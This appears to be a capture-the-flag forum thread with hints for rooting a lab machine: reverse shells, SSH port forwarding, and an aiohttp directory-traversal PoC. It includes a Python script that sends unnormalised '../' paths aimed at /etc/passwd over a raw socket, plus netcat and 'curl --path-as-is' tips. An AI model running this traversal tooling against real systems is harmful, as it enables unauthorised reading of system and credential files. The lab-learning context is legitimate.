I solved it; my Linux distro's firewall had blocked the external connection.
I'd never heard of whatweb! It's installed on Kali by default, sheesh…
Thanks
I have a foothold, but could anybody explain why only specific reverse shells work? Is this some sort of security feature built into Linux or Python? How did you guys know what shell to use and what would work?
Not sure where I'm going wrong here, or even if I am. I've been able to access the low-level user and enumerate ports and services, and I even have the aiohttp PoC that corresponds to the service version. Whether I curl the service as Rosa, or use SSH port forwarding to browse the service that netstat reveals, the PoC gives nothing other than 000 or 404 response codes. Going to bed, brain is scrambled.
Never mind, I figured it out. The PoC script needs to be modified to suit the directory structure and port of the app on 8080. Nmap and Feroxbuster did the trick for finding that info. It was also useful to modify the script so that the successful command is echoed to the prompt, where it can be copy-pasted for ease of manipulation.
Pwnded. Thanks all for the tips.
I used LFI/Directory Traversal
My sequence was wrong. I wasted my time on the initial foothold going immediately "inside" using an exploit, though I initially got that "file" by fuzzing. When you get that "file", crack it. But maybe going into the server on my initial foothold still helped me at least see who among them to focus on.
Once inside using user:pass, enumerate, enumerate, enumerate. You'll see something that's only accessible from inside. Configure your SSH to be able to access that local thingy. You might fall into a rabbit hole at first because of fuzzing, but enumeration on the forwarded port will lead you to read something about a version that allows you to read local files (LFI) that aren't normally accessible with "user:pass". Play with the script and remember the directory from fuzzing the forwarded port. !!Got r00t.
My hint for this box is to remember that PoCs often need a tweak to work properly.
You don’t have to run an exact copy of the environment if you can find out what part makes it vulnerable, copying a function to your own test script works too. You might find an issue you didn’t expect with a payload.
This is the real answer for why the "exploits" aren't working for root. It seems there are multiple versions of the exploits out there, such as some Python ones, which don't actually send the path as-is; they normalize the path.
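The point in the post above (a Python PoC that builds the URL through a normalizing HTTP client never sends the `../` segments, so the traversal quietly becomes a request for `/etc/passwd` and the server answers 404) is worth seeing concretely. The following is an added example written for this thread, not code posted by any participant or taken from the PoC they used. It implements the RFC 3986 dot-segment removal that such clients apply (urllib3, which `requests` sits on, does this for http/https paths), and beside it builds the request line by hand so the path goes on the wire untouched. The host, port and the `/static/` route are placeholders, not values from the box.

```python
"""Added example: why a traversal PoC can lose its ../ on the wire,
and how to send the path verbatim. Placeholders only; no real target."""
import socket


def remove_dot_segments(path: str) -> str:
    """RFC 3986 5.2.4 dot-segment removal for an absolute path.

    This is the normalization an RFC-compliant HTTP client performs before
    sending, and it is what collapses /static/../../etc/passwd to /etc/passwd,
    so the server never sees the traversal the PoC intended.
    """
    segs = path.split("/")[1:]  # drop the empty segment before the leading '/'
    out = []
    for seg in segs:
        if seg == "..":
            if out:
                out.pop()
        elif seg != ".":
            out.append(seg)
    if segs and segs[-1] in (".", ".."):
        out.append("")  # a trailing dot segment leaves a trailing slash
    return "/" + "/".join(out)


def build_raw_request(host: str, path: str, method: str = "GET") -> bytes:
    """Build HTTP/1.1 request bytes with the path copied verbatim.

    No URL parser touches the path here, so ../ segments survive exactly as
    written, which is what a traversal check needs.
    """
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: raw-traversal-check\r\n"
        f"Connection: close\r\n\r\n"
    ).encode()


def request_line_path(raw: bytes) -> str:
    """Return the path from the request line, i.e. what actually goes out."""
    return raw.split(b"\r\n", 1)[0].split(b" ")[1].decode()


def traversal_survives(path: str) -> bool:
    """True when the raw request keeps a traversal that normalization would remove."""
    raw_path = request_line_path(build_raw_request("placeholder", path))
    return raw_path == path and remove_dot_segments(path) != path


def send_raw(host: str, port: int, raw: bytes, timeout: float = 5.0):
    """Send raw bytes over a plain socket; returns (status line, body).

    Only for use against a host you are authorized to test. The tests below
    never call this; everything else runs offline.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    head, _, body = b"".join(chunks).partition(b"\r\n\r\n")
    return head.split(b"\r\n")[0].decode(errors="replace"), body


if __name__ == "__main__":
    # Placeholder values; the route name and target are assumptions.
    traversal = "/static/../../etc/passwd"
    print("what a normalizing client sends :", remove_dot_segments(traversal))
    print("what the raw request sends      :",
          request_line_path(build_raw_request("127.0.0.1:8080", traversal)))
    # Uncomment to actually fire it through an SSH local forward:
    # status, body = send_raw("127.0.0.1", 8080, build_raw_request("127.0.0.1:8080", traversal))
    # print(status); print(body[:200])
```

If your PoC uses `requests` or another high-level client, compare its outgoing request line (a local `nc -lvp 8080` makes a fine listener) with the path you passed in; if the `../` segments are gone, swapping in a raw socket, or `curl --path-as-is`, is the tweak the thread is talking about.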
Rooted. Very straightforward machine:
- foothold: you can find exploits online
- user: enumerate
- root: double check your ports and files/directories
Rooted. Nice easy machine.
Hello, I have a genuine question: how would I know what other payload to use in case the default Python reverse shell doesn't work? Although I managed to get the user flag, I feel like without reading the forum I wouldn't have been able to. So what's the catch? Can someone explain a thought process, or maybe a different view of it?
You could just brute force the request with a list of payloads, but you could've also just used normal commands with netcat to send back the responses and enumerate for the SSH creds.
Hello, thanks for the tip. The reverse shell worked, but when trying uname -r I got a generic Linux response.
Rooted the machine.
nice one.
thanks for all the tips